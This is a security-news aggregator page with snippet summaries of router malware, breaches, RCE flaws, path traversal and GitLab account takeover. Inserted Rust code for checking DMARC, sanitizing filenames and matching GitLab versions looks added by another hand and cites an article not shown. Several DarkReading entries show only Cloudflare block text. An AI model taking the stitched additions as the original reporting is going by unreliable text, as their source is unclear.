… versus ), but their volume grew …

1 day, 8 hours ago @ xakep.ru
Post-quantum cryptography in Chrome can break TLS

Google began testing a new quantum-resistant TLS key encapsulation mechanism in August last year, and in the latest Chrome release enabled it for all browser users.

"After several months of experimentation for compatibility and performance impacts, we're launching a hybrid postquantum TLS key exchange to desktop platforms in Chrome 124," the Chrome Security Team wrote.

However, since the release of Google Chrome 124 and Microsoft Edge 124, some web applications, firewalls and servers have been dropping connections after the ClientHello message of the TLS handshake.

Site administrators are therefore advised to test their servers by manually enabling the new feature in Google Chrome 124 via…

1 day, 8 hours ago @ xakep.ru
Cuttlefish infects routers and hunts for credentials in traffic

Researchers have found new malware, Cuttlefish, that infects SOHO routers to monitor the data passing through them and steal authentication information.

Black Lotus Labs at Lumen Technologies explains that Cuttlefish is designed to steal data contained in web requests that pass through the router from the adjacent local network.

Cuttlefish comes in builds for ARM, i386, i386_i686, i386_x64, mips32 and mips64, covering most router architectures.

Cuttlefish passively "listens" to packets for "credential markers" in traffic, such as usernames, passwords and tokens, particularly those associated with public…

1 day, 10 hours ago @ xakep.ru
Dropbox breached. Customer data and authentication secrets stolen

Dropbox reports that hackers got into the production systems of its Dropbox Sign eSignature platform and gained access to authentication tokens, multi-factor authentication (MFA) data, hashed passwords and customer information.

Dropbox Sign (formerly HelloSign) is an e-signature platform that lets customers store, send and sign documents online with legally binding signatures.

On April 24, 2024, Dropbox discovered unauthorized access to Dropbox Sign production systems and opened an investigation.

It turned out the attackers had somehow gained access to an automated configuration tool for the Dropbox Sign system, …

1 day, 12 hours ago @ xakep.ru
Discord bans the Spy Pet service's bots

Discord has blocked numerous accounts linked to the Spy Pet service, which drew media attention last week.

Last week journalists at 404 Media published an investigation into Spy Pet, a service that tracks and archives billions of messages on public Discord servers.

Notably, Discord had known about Spy Pet since at least February this year, and the company has not explained why it acted only now, after Spy Pet was covered in the media.

In particular, a user nicknamed Spy Pet uploaded several dumps of messages obtained from Spy Pet to Kiwi Farms.

When the developers of Dis…

6 days, 4 hours ago @ xakep.ru
In English 🇺🇸
The Hacker News
latest post 7 hours ago
Expert-Led Webinar - Uncovering Latest DDoS Tactics and Learn How to Fight Back

In today's rapidly evolving digital landscape, the threat of Distributed Denial of Service (DDoS) attacks looms more significant than ever.

To address this urgent need, we are thrilled to announce our upcoming webinar, "Uncovering Contemporary DDoS Attack Tactics—How to Fight Back," featuring the expertise of Andrey Slastenov, Head of Security at Gcore.

What You Will Learn: Understanding the Threat: explore the escalated risks DDoS attacks pose to your business, including recent advancements in attack strategies like IoT botnets and amplification tactics.

7 hours ago @ thehackernews.com
Hackers Increasingly Abusing Microsoft Graph API for Stealthy Malware Communications

Threat actors have been increasingly weaponizing Microsoft Graph API for malicious purposes with the aim of evading detection.

This is done to "facilitate communications with command-and-control (C&C) infrastructure hosted on Microsoft cloud services," the Symantec Threat Hunter Team, part of Broadcom, said in a report shared with The Hacker News.

Since January 2022, multiple nation-state-aligned hacking groups have been observed using Microsoft Graph API for C&C.

The first known instance of Microsoft Graph API abuse, prior to its wider adoption, dates back to June 2021 in connection with an activity cluster dubbed Harvester that was found using a custom implant known as Graphon that utilized the A…

8 hours ago @ thehackernews.com
New Guide Explains How to Eliminate the Risk of Shadow SaaS and Protect Corporate Data

LayerX has recently released a new guide, "Let There Be Light: Eliminating the Risk of Shadow SaaS" for security and IT teams, which addresses this gap.

The guide explains the challenges of shadow SaaS, i.e., the use of unauthorized SaaS apps for work purposes, and suggests practices and controls that can mitigate them.

According to LayerX, 65% of SaaS apps are not approved by IT and 80% of workers admit to using unapproved apps.

Shadow SaaS Mitigation Guidelines. To address the risk of shadow SaaS, the guide introduces a three-pronged approach: App Discovery, User Monitoring, and Active Enforcement.

Here's how secure browser extensions work: Discovery of All SaaS Apps - The secure browser ext…

10 hours ago @ thehackernews.com
NSA, FBI Alert on N. Korean Hackers Spoofing Emails from Trusted Sources

The U.S. government on Thursday published a new cybersecurity advisory warning of North Korean threat actors' attempts to send emails in a manner that makes them appear like they are from legitimate and trusted parties.

The joint bulletin was published by the National Security Agency (NSA), the Federal Bureau of Investigation (FBI), and the Department of State.

The technique specifically concerns exploiting improperly configured DNS Domain-based Message Authentication, Reporting, and Conformance (DMARC) record policies to conceal social engineering attempts.

In doing so, the threat actors can send spoofed emails as if they are from a legitimate domain's email server.

It is possible that TA4…
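The misconfiguration the advisory describes is visible in a single DNS TXT record. As an added example, not part of the advisory and not a tool named on this page, this Rust function parses a _dmarc record and says whether spoofing is actually blocked: p=none only reports, pct below 100 enforces on a fraction of failing mail, sp=none leaves subdomains open, and a malformed record is ignored by receivers altogether, which is as good as none. The sample records and domain names are constructed; fetching the record over DNS is left to the caller.

```rust
use std::collections::HashMap;

#[derive(Debug, PartialEq)]
pub enum Verdict {
    Enforcing,
    Partial(String),      // a policy exists but leaves a gap a spoofer can use
    NotEnforcing(String), // mail that fails DMARC is still delivered
    Invalid(String),      // receivers will ignore the record entirely
}

/// Split "v=DMARC1; p=none; rua=mailto:..." into tag/value pairs (RFC 7489 tag-value syntax).
pub fn parse_dmarc(txt: &str) -> Result<HashMap<String, String>, String> {
    let mut tags = HashMap::new();
    for part in txt.split(';') {
        let part = part.trim();
        if part.is_empty() {
            continue;
        }
        let (k, v) = part
            .split_once('=')
            .ok_or_else(|| format!("malformed tag {:?}", part))?;
        let k = k.trim().to_ascii_lowercase();
        // The version tag must come first; receivers discard the record otherwise.
        if tags.is_empty() && k != "v" {
            return Err("v=DMARC1 must be the first tag".into());
        }
        tags.insert(k, v.trim().to_string());
    }
    if tags.get("v").map(String::as_str) != Some("DMARC1") {
        return Err("missing or wrong version tag, expected v=DMARC1".into());
    }
    if !tags.contains_key("p") {
        return Err("missing required p= tag".into());
    }
    Ok(tags)
}

/// Judge the record the way someone probing for spoofable domains would.
pub fn assess_dmarc(txt: &str) -> Verdict {
    if txt.trim().is_empty() {
        return Verdict::NotEnforcing("no DMARC record published".into());
    }
    let tags = match parse_dmarc(txt) {
        Ok(t) => t,
        Err(e) => return Verdict::Invalid(e),
    };
    let p = tags["p"].to_ascii_lowercase();
    let pct = tags.get("pct").and_then(|s| s.parse::<u32>().ok()).unwrap_or(100);
    let sp = tags.get("sp").map(|s| s.to_ascii_lowercase());
    match p.as_str() {
        "none" => Verdict::NotEnforcing("p=none: receivers only report, spoofed mail is delivered".into()),
        "quarantine" | "reject" => {
            if pct < 100 {
                Verdict::Partial(format!("pct={}: only that share of failing mail gets p={}", pct, p))
            } else if sp.as_deref() == Some("none") {
                Verdict::Partial("sp=none: subdomains are not enforced".into())
            } else {
                Verdict::Enforcing
            }
        }
        other => Verdict::Invalid(format!("unknown policy p={}", other)),
    }
}

fn main() {
    // Constructed records, not any real domain's DNS data.
    let samples = [
        ("example.com", "v=DMARC1; p=none; rua=mailto:dmarc@example.com"),
        ("example.net", "v=DMARC1; p=reject; rua=mailto:dmarc@example.net"),
        ("example.org", "v=DMARC1; p=quarantine; pct=10"),
        ("example.edu", ""),
    ];
    for (domain, record) in samples.iter() {
        println!("_dmarc.{}: {:?}", domain, assess_dmarc(record));
    }
}
```

In practice the check is run against `dig +short TXT _dmarc.<domain>`, and the same question should be asked of every subdomain that sends mail, since a p=reject on the apex with sp=none still leaves those open.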

11 hours ago @ thehackernews.com
Google Announces Passkeys Adopted by Over 400 Million Accounts

Google on Thursday announced that passkeys are being used by over 400 million Google accounts, authenticating users more than 1 billion times over the past two years.

In addition, the company said it's expanding Cross-Account Protection, which alerts of suspicious events with third-party apps and services connected to a user's Google Account, to include more apps and services.

Google added passkeys to Chrome in December 2022 and has since rolled out the passwordless authentication solution across Google Accounts on all platforms by default.

"Passkeys can act as a first- and second-factor, simultaneously," Google product managers Sriram Karra and Christiaan Brand said.

This replaces your rem…

14 hours ago @ thehackernews.com
Four Critical Vulnerabilities Expose HPE Aruba Devices to RCE Attacks

HPE Aruba Networking (formerly Aruba Networks) has released security updates to address critical flaws impacting ArubaOS that could result in remote code execution (RCE) on affected systems.

Of the 10 security defects, four are rated critical in severity:
- CVE-2024-26304 (CVSS score: 9.8) - Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
- CVE-2024-26305 (CVSS score: 9.8) - Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
- CVE-2024-33511 (CVSS score: 9.8) - Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
- CVE-2024-33512 (CVSS …

15 hours ago @ thehackernews.com
Popular Android Apps Like Xiaomi, WPS Office Vulnerable to File Overwrite Flaw

Several popular Android applications available in Google Play Store are susceptible to a path traversal-affiliated vulnerability that could be exploited by a malicious app to overwrite arbitrary files in the vulnerable app's home directory.

Two of the apps that were found vulnerable to the problem are as follows - Xiaomi File Manager (com.mi.

Following responsible disclosure, both Xiaomi and WPS Office have rectified the issue as of February 2024.

Google has also published its own guidance on the matter, urging developers to properly handle the filename provided by the server application.

"If generating a unique filename is not practical, the client application should sanitize the provided f…

1 day, 6 hours ago @ thehackernews.com
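Both Dirty Stream items on this page (the Хакер report on Microsoft's technique and this one on the affected apps) come down to one check: the file name another app's content provider reports must never be used as a path. As an added example that is not Microsoft's, Xiaomi's or WPS Office's code, here is the naive join beside a hardened version in Rust (the platform code is Kotlin or Java; the logic carries over). The directory, file names and function names are constructed for illustration; the lexical normalization is a defence-in-depth step that works without touching the filesystem.

```rust
use std::path::{Component, Path, PathBuf};

/// Vulnerable pattern: the display name returned by another app's content provider
/// is joined onto this app's directory as-is, so "../shared_prefs/x.xml" lands outside it.
pub fn unsafe_target(target_dir: &Path, display_name: &str) -> PathBuf {
    target_dir.join(display_name)
}

#[derive(Debug, PartialEq)]
pub enum NameError {
    Empty,
    ControlChar,
    Separator,
    Traversal,
}

/// Hardened check: the name must be exactly one plain path component.
/// Both '/' and '\\' are rejected because the sending app, not the filesystem, chose the string.
pub fn sanitize_display_name(display_name: &str) -> Result<String, NameError> {
    if display_name.is_empty() {
        return Err(NameError::Empty);
    }
    if display_name.bytes().any(|b| b < 0x20 || b == 0x7f) {
        return Err(NameError::ControlChar);
    }
    if display_name.contains('/') || display_name.contains('\\') {
        return Err(NameError::Separator);
    }
    let mut comps = Path::new(display_name).components();
    match (comps.next(), comps.next()) {
        (Some(Component::Normal(_)), None) => Ok(display_name.to_string()),
        _ => Err(NameError::Traversal), // ".", ".." or anything that is not a plain name
    }
}

/// Resolve "." and ".." lexically, so the check also works before the file exists.
pub fn lexical_normalize(p: &Path) -> PathBuf {
    let mut out = PathBuf::new();
    for c in p.components() {
        match c {
            Component::CurDir => {}
            Component::ParentDir => {
                out.pop();
            }
            other => out.push(other.as_os_str()),
        }
    }
    out
}

/// Sanitize the name, then confirm the joined path still lies strictly under target_dir.
pub fn safe_target(target_dir: &Path, display_name: &str) -> Result<PathBuf, NameError> {
    let name = sanitize_display_name(display_name)?;
    let base = lexical_normalize(target_dir);
    let candidate = lexical_normalize(&target_dir.join(&name));
    if candidate == base || !candidate.starts_with(&base) {
        return Err(NameError::Traversal);
    }
    Ok(candidate)
}

fn main() {
    let dir = Path::new("/data/data/com.example.victim/files");
    let names = ["report.pdf", "../shared_prefs/com.example.victim_preferences.xml", "..", ""];
    for name in names.iter() {
        println!(
            "{:?}\n  naive join -> {:?}\n  hardened   -> {:?}",
            name,
            lexical_normalize(&unsafe_target(dir, name)),
            safe_target(dir, name)
        );
    }
}
```

Even a sanitized name is still attacker-chosen, which is why Google's guidance quoted above prefers generating a unique filename and only falls back to sanitizing the provided one; the check here is the fallback, not the first choice.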
Ukrainian REvil Hacker Sentenced to 13 Years and Ordered to Pay $16 Million

A Ukrainian national has been sentenced to more than 13 years in prison and ordered to pay $16 million in restitution for carrying out thousands of ransomware attacks and extorting victims.

Yaroslav Vasinskyi (aka Rabotnik), 24, along with his co-conspirators part of the REvil ransomware group orchestrated more than 2,500 ransomware attacks and demanded ransom payments in cryptocurrency totaling more than $700 million.

"The co-conspirators demanded ransom payments in cryptocurrency and used cryptocurrency exchangers and mixing services to hide their ill-gotten gains," the U.S. Department of Justice (DoJ) said.

"To drive their ransom demands higher, Sodinokibi/REvil co-conspirators also publ…

1 day, 8 hours ago @ thehackernews.com
When is One Vulnerability Scanner Not Enough?

The benefits of using multiple scanning engines. Generally speaking, vulnerability scanners aim to produce checks for as many vulnerabilities as possible.

So it's a harsh reality that one day you may find out that you've been compromised via an attack vector which your vulnerability scanner simply doesn't have a check for.

Most recently, Intruder has added Nuclei to its suite of vulnerability scanning engines, enhancing its ability to manage and secure attack surfaces.

Nuclei is an open-source vulnerability scanning engine, similar to OpenVAS, which is fast, extensible, and covers a wide range of weaknesses.

You can reduce your attack surface by continuously monitoring for changes with an aut…

1 day, 10 hours ago @ thehackernews.com
Dropbox Discloses Breach of Digital Signature Service Affecting All Users

Cloud storage services provider Dropbox on Wednesday disclosed that Dropbox Sign (formerly HelloSign) was breached by unidentified threat actors, who accessed emails, usernames, and general account settings associated with all users of the digital signature product.

Even worse, the intrusion also affects third-parties who received or signed a document through Dropbox Sign, but never created an account themselves, specifically exposing their names and email addresses.

The incident is also said to be restricted to Dropbox Sign infrastructure.

"Our security team also reset users' passwords, logged users out of any devices they had connected to Dropbox Sign, and is coordinating the rotation of …

1 day, 10 hours ago @ thehackernews.com
New "Goldoon" Botnet Targets D-Link Routers With Decade-Old Flaw

A never-before-seen botnet called Goldoon has been observed targeting D-Link routers with a nearly decade-old critical security flaw with the goal of using the compromised devices for further attacks.

The vulnerability in question is CVE-2015-2051 (CVSS score: 9.8), which affects D-Link DIR-645 routers and allows remote attackers to execute arbitrary commands by means of specially crafted HTTP requests.

Telemetry data from the network security company points to a spike in the botnet activity around April 9, 2024.

"Cybercriminals rent out compromised routers to other criminals, and most likely also make them available to commercial residential proxy providers," cybersecurity company Trend Mi…

1 day, 10 hours ago @ thehackernews.com
CISA Warns of Active Exploitation of Severe GitLab Password Reset Vulnerability
CISA Warns of Active Exploitation of Severe GitLab Password Reset Vulnerability CISA Warns of Active Exploitation of Severe GitLab Password Reset Vulnerability

Tracked as CVE-2023-7028 (CVSS score: 10.0), the maximum severity vulnerability could facilitate account takeover by sending password reset emails to an unverified email address.

"Similarly, tampering with repository code might involve inserting malware that compromises system integrity or introduces backdoors for unauthorized access.

Malicious code or abuse of the pipeline could lead to data theft, code disruption, unauthorized access, and supply chain attacks."

The flaw has been addressed in GitLab versions 16.5.6, 16.6.4, and 16.7.2, with the patches also backported to versions 16.1.6, 16.2.9, 16.3.7, and 16.4.5.

CISA has yet to provide any other details as to how the vulnerability is be…
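The fixed versions listed above are exactly what a vulnerability-management check needs, so here is an added example in Rust (not GitLab's code and not a tool named on this page) that maps a reported GitLab version to patched, vulnerable or outside the listed branches. The only data it relies on are the seven fixed releases from the text; a version in a minor branch the text does not list is reported as OutsideListedBranches rather than guessed, because the page does not say which other branches are affected. The host names in main are constructed.

```rust
#[derive(Debug, PartialEq, Eq, Clone, Copy)]
pub struct Version {
    pub major: u32,
    pub minor: u32,
    pub patch: u32,
}

/// Parse "16.5.6", "v16.5.6" or "16.5.6-ee"; anything else is None rather than a guess.
pub fn parse_version(s: &str) -> Option<Version> {
    let core = s
        .trim()
        .trim_start_matches('v')
        .split(|c: char| c == '-' || c == '+')
        .next()?;
    let mut parts = core.split('.').map(|p| p.parse::<u32>().ok());
    let (major, minor, patch) = (parts.next()??, parts.next()??, parts.next()??);
    if parts.next().is_some() {
        return None;
    }
    Some(Version { major, minor, patch })
}

const fn v(major: u32, minor: u32, patch: u32) -> Version {
    Version { major, minor, patch }
}

/// Fixed releases named in the advisory text: one per affected minor branch.
pub const FIXED: [Version; 7] = [
    v(16, 1, 6), v(16, 2, 9), v(16, 3, 7), v(16, 4, 5), v(16, 5, 6), v(16, 6, 4), v(16, 7, 2),
];

#[derive(Debug, PartialEq)]
pub enum Status {
    Patched,
    Vulnerable { fixed_in: Version },
    /// Branch not covered by the list above (older than 16.1 or newer than 16.7):
    /// consult the advisory rather than assume either way.
    OutsideListedBranches,
}

/// A version is patched when its patch level reaches the fix for its own minor branch;
/// comparing against the highest fixed release alone would call 16.6.3 patched (it is not).
pub fn status_for(ver: Version) -> Status {
    match FIXED.iter().find(|f| f.major == ver.major && f.minor == ver.minor) {
        Some(f) if ver.patch >= f.patch => Status::Patched,
        Some(f) => Status::Vulnerable { fixed_in: *f },
        None => Status::OutsideListedBranches,
    }
}

pub fn status_for_str(s: &str) -> Option<Status> {
    parse_version(s).map(status_for)
}

fn main() {
    // Constructed inventory; in practice the version string comes from each instance.
    let inventory = [
        ("git-a", "16.5.5-ee"),
        ("git-b", "16.7.2"),
        ("git-c", "16.1.3"),
        ("git-d", "16.8.0"),
        ("git-e", "latest"),
    ];
    for (host, ver) in inventory.iter() {
        println!("{:<6} {:<10} {:?}", host, ver, status_for_str(ver));
    }
}
```

The per-branch comparison is the point: backported fixes mean a lower version number on an older branch can be patched while a higher number on a newer branch is still vulnerable, so a single "newer than X" rule gets this wrong in both directions.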

1 day, 14 hours ago @ thehackernews.com
New Cuttlefish Malware Hijacks Router Connections, Sniffs for Cloud Credentials

"A secondary function gives it the capacity to perform both DNS and HTTP hijacking for connections to private IP space, associated with communications on an internal network."

It subsequently downloads and executes the Cuttlefish payload from a dedicated server depending on the router architecture (e.g., Arm, i386, i386_i686, i386_x64, mips32, and mips64).

"Cuttlefish represents the latest evolution in passive eavesdropping malware for edge networking equipment [...] as it combines multiple attributes," the cybersecurity firm said.

"It has the ability to perform route manipulation, hijack connections, and employs passive sniffing capability.

With the stolen key material, the actor not only …

1 day, 15 hours ago @ thehackernews.com
Bitcoin Forensic Analysis Uncovers Money Laundering Clusters and Criminal Proceeds

A forensic analysis of a graph dataset containing transactions on the Bitcoin blockchain has revealed clusters associated with illicit activity and money laundering, including detecting criminal proceeds sent to a crypto exchange and previously unknown wallets belonging to a Russian darknet market.

"This is different to conventional crypto AML solutions, which rely on tracing funds from known illicit wallets, or pattern-matching with known money laundering practices."

Robinson said just considering the "shape" – the local structures within a complex network – of the money laundering subgraphs proved to be an already effective way to flag criminal activity.

Further examination of the subgrap…

2 days, 6 hours ago @ thehackernews.com
Android Malware Wpeeper Uses Compromised WordPress Sites to Hide C2 Servers

Cybersecurity researchers have discovered a previously undocumented malware targeting Android devices that uses compromised WordPress sites as relays for its actual command-and-control (C2) servers for detection evasion.

The malware, codenamed Wpeeper, is an ELF binary that leverages the HTTPS protocol to secure its C2 communications.

Wpeeper relies on a multi-tier C2 architecture that uses infected WordPress sites as an intermediary to obscure its true C2 servers.

"These [hard-coded servers] are not C2s but C2 redirectors -- their role is to forward the bot's requests to the real C2, aimed at shielding the actual C2 from detection," the researchers said.

The commands retrieved from the C2 …

2 days, 7 hours ago @ thehackernews.com
threatpost
latest post: none
DarkReading
latest post 5 months, 1 week ago
Cyber Threats to Watch Out for in 2024

5 months, 1 week ago @ darkreading.com
CISA, NCSC Offer a Road Map, Not Rules, in New Secure AI Guidelines

5 months, 1 week ago @ darkreading.com
Ardent Health Hospitals Disrupted After Ransomware Attack

5 months, 1 week ago @ darkreading.com
General Electric, DARPA Hack Claims Raise National Security Concerns

5 months, 1 week ago @ darkreading.com
Hamas-Linked APT Wields New SysJoker Backdoor Against Israel

5 months, 1 week назад @ darkreading.com
Data De-Identification: Balancing Privacy, Efficacy & Cybersecurity
Data De-Identification: Balancing Privacy, Efficacy & Cybersecurity

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

5 months, 1 week назад @ darkreading.com
Balancing Simplicity and Security in the Digital Experience
Balancing Simplicity and Security in the Digital Experience

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

5 months, 1 week назад @ darkreading.com
Hack The Box Launches 5th Annual University CTF Competition
Hack The Box Launches 5th Annual University CTF Competition

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

5 months, 1 week назад @ darkreading.com
Fake Browser Updates Targeting Mac Systems With Infostealer
Fake Browser Updates Targeting Mac Systems With Infostealer

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

5 months, 1 week назад @ darkreading.com
Kiteworks' Maytech Acquisition Reaffirms Commitment to UK Market
Kiteworks' Maytech Acquisition Reaffirms Commitment to UK Market

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

5 months, 1 week назад @ darkreading.com
Generative AI Takes on SIEM
Generative AI Takes on SIEM

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

5 months, 1 week назад @ darkreading.com
Web Shells Gain Sophistication for Stealth, Persistence
Web Shells Gain Sophistication for Stealth, Persistence

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

5 months, 1 week назад @ darkreading.com
Qatar Cyber Agency Runs National Cyber Drills
Qatar Cyber Agency Runs National Cyber Drills

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

5 months, 1 week назад @ darkreading.com
Researchers Undermine 'Windows Hello' on Lenovo, Dell, Surface Pro PCs
Researchers Undermine 'Windows Hello' on Lenovo, Dell, Surface Pro PCs

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

5 months, 1 week назад @ darkreading.com
Mideast Oil & Gas Facilities Could Face Cyber-Related Energy Disruptions
Mideast Oil & Gas Facilities Could Face Cyber-Related Energy Disruptions

This website is using a security service to protect itself from online attacks.

The action you just performed triggered the security solution.

There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.

You can email the site owner to let them know you were blocked.

Please include what you were doing when this page came up and the Cloudflare Ray ID found at the bottom of this page.

5 months, 1 week назад @ darkreading.com
WeLiveSecurity
latest post 1 day, 11 hours ago
Adding insult to injury: crypto recovery scams

Imagine an even worse outcome: you are approached by someone or see an advert offering cryptocurrency recovery services.

Unfortunately, this type of “recovery fraud” is increasingly common, and even the FBI issued a Public Service Announcement (PSA) about it last year.

How do crypto recovery scams work?

Sample messages peddling cryptocurrency recovery services in discussion forums

Some crypto recovery scammers are advertising their wares via low-cost online press release distribution services.

Avoiding crypto theft

Granted, the best way to avoid crypto recovery scams is not to have your digital currency stolen in the first place.

1 day, 11 hours ago @ welivesecurity.com
MDR: Unlocking the power of enterprise-grade security for businesses of all sizes

Considering the potential influences of these responsibilities on business functions, it’s prudent to open a conversation about offloading certain tasks through an MDR service.

Additionally, the service includes all modules of ESET PROTECT Elite, the ESET MDR service, and ESET Premium Support Essential.

An MDR service offers a comprehensive solution in a unified experience.

As such, these days, it is not only businesses themselves that acknowledge the need for robust cybersecurity solutions.

For enterprises looking to elevate their security posture, ESET PROTECT MDR Ultimate offers proactive prevention with superior protection and, through a tailor-fit security service, enables granula…

3 days, 11 hours ago @ welivesecurity.com
Why space exploration is important for Earth and its future: Q&A with David Eicher

David J. Eicher (born August 7, 1961) is an American editor, writer, and popularizer of astronomy and space.

This is of course a very critical time to always remember the question of the future of our home planet.

We take Earth as a habitat and our life on Earth for granted.

Some argue that it doesn't make sense to explore the depths of space when we need to address serious problems here on Earth.

What do you think are the greatest benefits of what we have already learned about the universe and space?

4 days, 1 hour ago @ welivesecurity.com
Major phishing-as-a-service platform disrupted – Week in security with Tony Anscombe

The investigation uncovered at least 40,000 phishing domains that were linked to LabHost and tricked victims into handing over their sensitive details

One of the world’s largest phishing-as-a-service (PhaaS) platforms known as LabHost has been disrupted in a global law enforcement operation, Europol has announced.

Some 10,000 people across the world used the service, with the monthly fee averaging $249.

The investigation uncovered at least 40,000 phishing domains that were linked to LabHost and tricked users into handing over their sensitive details.

Learn more about the sting in the video – and make sure you know how to avoid falling victim to a phishing attack.

In other cybercrime news, US…

1 week ago @ welivesecurity.com
Gripped by Python: 5 reasons why Python is popular among cybersecurity professionals

Let’s look a little more closely at these and some other benefits that have ultimately made Python the go-to language for many professionals, including in cybersecurity.

By offering a comprehensive toolkit for a wide range of tasks, it can be a universal language for cybersecurity professionals.

By harnessing Python's extensive libraries and frameworks, developers can leverage pre-built modules to accelerate development cycles and enhance functionality.

Python’s versatility extends beyond security-specific automation, however, as it enables organizations to also automate administrative tasks, such as user provisioning and system configuration management, with ease.

From threat intelligence …

1 week, 1 day ago @ welivesecurity.com
What makes Starmus unique? – A Q&A with award-winning filmmaker Todd Miller

The director of the Apollo 11 movie shares his views about the role of technology in addressing pressing global challenges as well as why he became involved with Starmus.

24 Apr 2024

1 week, 2 days ago @ welivesecurity.com
How technology drives progress – A Q&A with Nobel laureate Michel Mayor

We spoke to Michel Mayor about the importance of public engagement with science and fostering responsibility among the youth for the preservation of our changing planet

Join us as we speak to the Nobel Prize-winning astronomer Michel Mayor about the intersection of technology and scientific discovery, the art of making science accessible to all, and the imperative of nurturing environmental stewardship among the youth.

In this short video, Professor Mayor offers his quick takes on:
- the role of technology in driving scientific progress
- strategies for communicating complex scientific concepts to the broader public
- fostering a sense of responsibility among the youth towards the preservation of pla…

1 week, 3 days ago @ welivesecurity.com
The vision behind Starmus – A Q&A with the festival’s co-founder Garik Israelian

Dr. Israelian talks about Starmus's vision and mission, the importance of inspiring and engaging audiences, and the strong sense of community within the Starmus universe

In this exclusive interview, we delve into the heart of the Starmus Festival with Dr. Garik Israelian, an astrophysicist and the visionary force behind the festival.

Join us as Dr. Israelian shares his views about Starmus's vision and mission, the importance of inspiring and engaging audiences, and the sense of community within the Starmus universe.

What’s the goal of Starmus?

How is the Starmus community evolving?

What empowering messages does Starmus convey to the youth?

1 week, 3 days ago @ welivesecurity.com
Protecting yourself after a medical data breach – Week in security with Tony Anscombe

What are the risks and consequences of having your health data exposed and what are the steps to take if it happens to you?

Attackers behind the disruptive ransomware attack at medical firm Change Healthcare in late February have begun to leak what they claim are corporate and patient data stolen during the attack.

In this week's video, Tony looks at the risks and consequences of having your health data exposed and the steps you should take if your data is exposed.

2 weeks ago @ welivesecurity.com
The many faces of impersonation fraud: Spot an imposter before it’s too late

This is impersonation fraud, and it’s fast becoming one of the highest earners for cybercriminals.

What does impersonation fraud look like?

Fake social media accounts are a growing challenge, used to spread scam links and too-good-to-be-true offers.

Bogus notification

Unusual messages: Phishing emails often contain inconsistencies which mark them out as impersonation fraud.

With any impersonation fraud, the key is: be skeptical, slow down, and independently verify they are who they say they are.

2 weeks, 1 day ago @ welivesecurity.com
The ABCs of how online ads can impact children’s well-being

From promoting questionable content to posing security risks, inappropriate ads present multiple dangers for children.

With the rise of social media influencers and curated online content, ads often portray an idealized version of reality that may not reflect the complexities of everyday life.

Parents or responsible adults must help children critically evaluate media messages and develop a balanced perspective.

Security and privacy risks

Some ads that children may be exposed to can pose significant security and privacy risks.

From promoting questionable content to posing financial, security, and privacy risks, ads present multiple dangers for young minds.

2 weeks, 3 days ago @ welivesecurity.com
Bitcoin scams, hacks and heists – and how to avoid them

Here’s how cybercriminals target cryptocurrencies and how you can keep your bitcoin or other crypto safe

Bitcoin is on a tear.

Threat actors are primed and ready to ruthlessly exploit any users lacking digital savvy – via scams and sophisticated malware.

We can divide the main threats into three types: malware, scams and third-party breaches.

Examples of scam sites (source: ESET Threat Report H1 2023)

Bogus play-to-earn video game (source: ESET Threat Report H1 2023)

2 weeks, 4 days ago @ welivesecurity.com
eXotic Visit includes XploitSPY malware – Week in security with Tony Anscombe

Could your messaging app of choice have been authored by a threat actor known as Virtual Invaders?

As described by ESET researchers this week, this is what happened to the victims of an ongoing and targeted Android espionage campaign called eXotic Visit that began in late 2021 and poses as messaging services.

The malicious apps – which were distributed through dedicated websites and even Google Play – masqueraded as messaging services, but came bundled with the XploitSPY malware.

The campaign appears to have targeted people mainly in Pakistan and India.

To learn more, watch the video and make sure to read the full blogpost.

3 weeks ago @ welivesecurity.com
Beyond fun and games: Exploring privacy risks in children’s apps

But they could also expose them to exploitative advertising, inappropriate content, and security and privacy risks.

The challenge for parents is compounded by complex privacy settings, opaque privacy policies, regulatory loopholes, weak enforcement and our own lack of awareness.

Limited privacy information: Despite regulatory requirements in many jurisdictions, kids’ apps can feature opaque privacy/security policies which make it unclear how your child’s data will be used and protected.

Security risks: Mobile apps also pose significant security risks.

Educate your children about the importance of protecting their personal information and the potential consequences of security and privacy ri…

